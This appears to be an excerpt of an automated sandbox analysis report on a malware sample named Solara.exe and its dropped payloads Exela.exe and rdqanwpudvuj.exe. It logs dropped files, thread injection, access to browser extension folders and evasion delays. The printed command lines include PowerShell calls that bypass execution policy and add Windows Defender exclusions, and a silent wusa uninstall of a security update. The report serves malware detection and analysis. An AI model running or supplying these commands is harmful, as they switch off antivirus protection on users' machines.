                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5779Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4034Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7412Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1977Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6732Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2472Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7724
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1764
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2142
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1158
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5013
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\_socket.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeDropped PE file which has not been started: C:\Windows\Temp\ypynqohyxqjk.sysJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\_multiprocessing.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\_lzma.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\python310.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_websocket\mask.cp310-win_amd64.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\_uuid.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_http_parser.cp310-win_amd64.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\_sqlite3.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\pyexpat.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\yarl\_quoting_c.cp310-win_amd64.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\_decimal.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\_asyncio.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\python3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\_queue.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\_cffi_backend.cp310-win_amd64.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\frozenlist\_frozenlist.cp310-win_amd64.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\select.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\_ssl.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\unicodedata.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_websocket\reader_c.cp310-win_amd64.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\_bz2.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\_overlapped.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\propcache\_helpers_c.cp310-win_amd64.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\_hashlib.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_http_writer.cp310-win_amd64.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\_ctypes.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\multidict\_multidict.cp310-win_amd64.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_76-18228
                Source: C:\Windows\System32\conhost.exeAPI coverage: 0.9 %
                Source: C:\Users\user\Desktop\Solara.exe TID: 6920Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4300Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3028Thread sleep count: 7412 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2860Thread sleep count: 1977 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5892Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6740Thread sleep count: 6732 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6740Thread sleep count: 2472 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6004Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4904Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4504Thread sleep count: 7724 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1660Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3172Thread sleep count: 1764 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6136Thread sleep count: 2142 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6136Thread sleep count: 1158 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1464Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5688Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5976Thread sleep count: 5013 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4504Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5700Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AE983B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,76_2_00007FF75AE983B0
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AE992F0 FindFirstFileExW,FindClose,76_2_00007FF75AE992F0
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEB18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,76_2_00007FF75AEB18E4
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FF75AE992F0 FindFirstFileExW,FindClose,77_2_00007FF75AE992F0
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FF75AE983B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,77_2_00007FF75AE983B0
                Source: C:\Users\user\Desktop\Solara.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AE9D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,76_2_00007FF75AE9D19C
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB084A3230 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,77_2_00007FFB084A3230
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEB34F0 GetProcessHeap,76_2_00007FF75AEB34F0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\conhost.exeCode function: 64_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,64_2_0000000140001160
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AE9D37C SetUnhandledExceptionFilter,76_2_00007FF75AE9D37C
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AE9D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,76_2_00007FF75AE9D19C
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AE9C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,76_2_00007FF75AE9C910
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEAA684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,76_2_00007FF75AEAA684
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB08036050 SetUnhandledExceptionFilter,77_2_00007FFB08036050
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB08033048 IsProcessorFeaturePresent,00007FFB1C8119C0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFB1C8119C0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,77_2_00007FFB08033048
                Source: C:\Users\user\Desktop\Solara.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'
                Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Exela.exe'
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'Jump to behavior
                Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Exela.exe'Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                Bypasses PowerShell execution policy
                Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'
                Modifies the context of a thread in another process (thread injection)
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeThread register set: target process: 5200
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeThread register set: target process: 4300
                Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'Jump to behavior
                Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Users\user\AppData\Local\Temp\Solara.exe "C:\Users\user~1\AppData\Local\Temp\Solara.exe" Jump to behavior
                Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Exela.exe'Jump to behavior
                Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeProcess created: C:\Windows\System32\conhost.exe conhost.exe
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: C:\Users\user\AppData\Local\Temp\Exela.exe "C:\Users\user~1\AppData\Local\Temp\Exela.exe"
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: unknown unknown
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEB95E0 cpuid 76_2_00007FF75AEB95E0
                Source: C:\Users\user\Desktop\Solara.exeQueries volume information: C:\Users\user\Desktop\Solara.exe VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
